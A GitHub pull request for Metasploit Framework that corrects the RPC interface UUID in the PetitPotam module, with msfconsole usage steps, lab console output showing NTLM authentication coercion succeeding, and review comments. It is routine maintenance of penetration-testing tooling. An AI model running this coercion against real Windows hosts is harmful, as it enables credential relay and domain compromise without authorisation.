Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Fix PetitPotam UUID when using EsfRPC with lsarpc named pipe #19833

Merged
merged 2 commits into from
Jan 27, 2025
Merged

Fix PetitPotam UUID when using EsfRPC with lsarpc named pipe #19833

merged 2 commits into from
Jan 27, 2025

Conversation

cdelafuente-r7
Copy link
Contributor

According to 3.1.4.2 EFSRPC Interface, the UUID to bind to is different according to which server interface is used:

These calls are received at the well-known endpoint of the named pipe \pipe\lsarpc or \pipe\efsrpc. The server interface for \pipe\lsarpc MUST be identified by UUID [c681d488-d850-11d0-8c52-00c04fd90f7e], version 1.0. The server interface for \pipe\efsrpc MUST be identified by UUID [df1941c5-fe89-4e79-bf10-463657acf44d], version 1.0.

The current implementation of PetitPotam uses the LsaRPC UUID (12345778-1234-abcd-ef00-0123456789ab) when EsfRPC is used with the lsarpc named pipe. It should be c681d488-d850-11d0-8c52-00c04fd90f7e instead.

This PR fixes this by adding a specific class (EfsrpcOverLsarpc), overriding the UUID constant.

Verification

  • Start msfconsole
  • use auxiliary/scanner/dcerpc/petitpotam
  • run verbose=true rhosts=<remote host> SMBUser=<username> SMBPass=<password> SMBDomain=<domain if needed>
  • Verify you get the message Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful

Before this fix

msf6 auxiliary(scanner/dcerpc/petitpotam) > run verbose=true rhosts=192.168.232.111 SMBUser=msfuser SMBPass=123456 SMBDomain=newlab.local
[*] 192.168.232.111:445   - Binding to 12345778-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.232.111[\lsarpc] ...
[*] 192.168.232.111:445   - Bound to 12345778-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.232.111[\lsarpc] ...
[*] 192.168.232.111:445   - Attempting to coerce authentication via EfsRpcOpenFileRaw
[*] 192.168.232.111:445   - Error: 192.168.232.111: RubySMB::Dcerpc::Error::FaultError A fault occurred
[*] 192.168.232.111:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

After the fix

msf6 auxiliary(scanner/dcerpc/petitpotam) > run verbose=true rhosts=192.168.232.111 SMBUser=msfuser SMBPass=123456 SMBDomain=newlab.local
[*] 192.168.232.111:445   - Binding to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:192.168.232.111[\lsarpc] ...
[*] 192.168.232.111:445   - Bound to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:192.168.232.111[\lsarpc] ...
[*] 192.168.232.111:445   - Attempting to coerce authentication via EfsRpcOpenFileRaw
[*] 192.168.232.111:445   - Server responded with ERROR_ACCESS_DENIED (Access is denied.)
[*] 192.168.232.111:445   - Attempting to coerce authentication via EfsRpcEncryptFileSrv
[+] 192.168.232.111:445   - Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful
[*] 192.168.232.111:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

@smcintyre-r7 smcintyre-r7 self-assigned this Jan 24, 2025
smcintyre-r7
smcintyre-r7 reviewed Jan 24, 2025
View reviewed changes
modules/auxiliary/scanner/dcerpc/petitpotam.rb Outdated
@@ -9,6 +9,12 @@
require 'ruby_smb/dcerpc/lsarpc'
require 'ruby_smb/dcerpc/efsrpc'

module RubySMB::Dcerpc::EfsrpcOverLsarpc
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

If we want this to be accessible from RubySMB then we should probably move it there. I think this is more of an edge case though for petitpotam though so it make make more sense to just define an EfsrpcOverLsarpc module in the MetasploitModule class to avoid altering the global namespace.

Copy link
Contributor Author

@cdelafuente-r7 cdelafuente-r7 Jan 27, 2025
edited
Loading

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Yes, it makes sense. I've addressed this in b3c2ae4. Thank you!

@bwatters-r7
Copy link
Contributor

New and Improved:

msf6 auxiliary(scanner/dcerpc/petitpotam) > show options

Module options (auxiliary/scanner/dcerpc/petitpotam):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   LISTENER   10.5.135.201     yes       The host listening for the incoming connection
   METHOD     Automatic        yes       The RPC method to use for triggering (Accepted: Automatic, EfsRpcOpenFileRaw, EfsRpcEncryptFileSrv, EfsRpcDecryptF
                                         ileSrv, EfsRpcQueryUsersOnFile, EfsRpcQueryRecoveryAgents)
   PIPE       lsarpc           yes       The named pipe to use for triggering (Accepted: lsarpc, efsrpc, samr, lsass, netlogon)
   RHOSTS     10.5.134.180     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      445              yes       The SMB service port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass    v3Mpassword      no        The password for the specified username
   SMBUser    Administrator    no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/dcerpc/petitpotam) > run
[*] 10.5.134.180:445      - Binding to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:10.5.134.180[\lsarpc] ...
[*] 10.5.134.180:445      - Bound to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:10.5.134.180[\lsarpc] ...
[*] 10.5.134.180:445      - Attempting to coerce authentication via EfsRpcOpenFileRaw
[+] 10.5.134.180:445      - Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful
[*] 10.5.134.180:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/dcerpc/petitpotam) >

Old and busted:

msf6 auxiliary(scanner/dcerpc/petitpotam) > show options

Module options (auxiliary/scanner/dcerpc/petitpotam):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   LISTENER   10.5.135.201     yes       The host listening for the incoming connection
   METHOD     Automatic        yes       The RPC method to use for triggering (Accepted: Automatic, EfsRpcOpenFileRaw, EfsRpcEncryptFileSrv, EfsRpcDecryptF
                                         ileSrv, EfsRpcQueryUsersOnFile, EfsRpcQueryRecoveryAgents)
   PIPE       lsarpc           yes       The named pipe to use for triggering (Accepted: lsarpc, efsrpc, samr, lsass, netlogon)
   RHOSTS     10.5.134.180     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      445              yes       The SMB service port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass    v3Mpassword      no        The password for the specified username
   SMBUser    Administrator    no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/dcerpc/petitpotam) > run
[*] 10.5.134.180:445      - Binding to 12345778-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:10.5.134.180[\lsarpc] ...
[*] 10.5.134.180:445      - Bound to 12345778-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:10.5.134.180[\lsarpc] ...
[*] 10.5.134.180:445      - Attempting to coerce authentication via EfsRpcOpenFileRaw
[*] 10.5.134.180:445      - Error: 10.5.134.180: RubySMB::Dcerpc::Error::FaultError A fault occurred
[*] 10.5.134.180:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/dcerpc/petitpotam) >

smcintyre-r7
smcintyre-r7 approved these changes Jan 27, 2025
View reviewed changes
Copy link
Contributor

@smcintyre-r7 smcintyre-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more. 

metasploit-framework (S:0 J:0) auxiliary(scanner/dcerpc/petitpotam) > run
[*] 192.168.159.10:445    - Binding to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:192.168.159.10[\lsarpc] ...
[*] 192.168.159.10:445    - Bound to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:192.168.159.10[\lsarpc] ...
[*] 192.168.159.10:445    - Attempting to coerce authentication via EfsRpcOpenFileRaw
[*] 192.168.159.10:445    - Server responded with ERROR_ACCESS_DENIED (Access is denied.)
[*] 192.168.159.10:445    - Attempting to coerce authentication via EfsRpcEncryptFileSrv
[+] 192.168.159.10:445    - Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful
[*] 192.168.159.10:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
metasploit-framework (S:0 J:0) auxiliary(scanner/dcerpc/petitpotam) >

@smcintyre-r7 smcintyre-r7 merged commit 936e0df into rapid7:master Jan 27, 2025
37 checks passed
@smcintyre-r7
Copy link
Contributor

Release Notes

This fixes an issue with the petitpotam module where in the default configuration, an incorrect service UUID was being used.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@smcintyre-r7 smcintyre-r7 smcintyre-r7 approved these changes

Assignees

@smcintyre-r7 smcintyre-r7

Labels
bug
Projects
Metasploit Kanban
Status: Done
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
3 participants
@cdelafuente-r7 @bwatters-r7 @smcintyre-r7